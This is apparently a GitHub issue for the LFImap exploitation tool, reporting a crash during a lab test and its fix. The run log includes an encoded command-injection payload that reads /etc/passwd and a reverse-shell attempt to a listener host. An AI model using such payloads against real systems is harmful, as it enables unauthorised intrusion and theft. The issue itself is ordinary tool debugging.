search

hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0
194 stars 29 forks source link

Unhandled Exception when command injection is possible + '-x' for reverse shell #61

Closed hansmach1ne closed 2 weeks ago

hansmach1ne commented 2 weeks ago 
└─$ python3 lfimap.py -U "http://10.10.200.85/vulnerabilities/exec/#" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost 10.8.164.25 --lport 99 -x

[i] Testing form-line 'ip' parameter...

[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> 'http://10.10.200.85/vulnerabilities/exec/#' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[.] Trying to pop reverse shell to 10.8.164.25:99 using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 477, in <module>
    main()
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 404, in main
    test_cmd_injection(url, post)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/cmdi.py", line 54, in test_cmd_injection
    r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 221, in REQUEST
    if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 106, in init
    pwn(exploit)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/pwn.py", line 72, in pwn
    exploit_bash(exploit, "CMD", ip, port)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/bash.py", line 79, in exploit_bash
    request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'
hansmach1ne commented 2 weeks ago

Fixed in https://github.com/hansmach1ne/LFImap/commit/935209fac9508ba577af31e37114528115496d5b.

bash.py: L79. Trivial fix, the function call had too many arguments, POST value specified twice.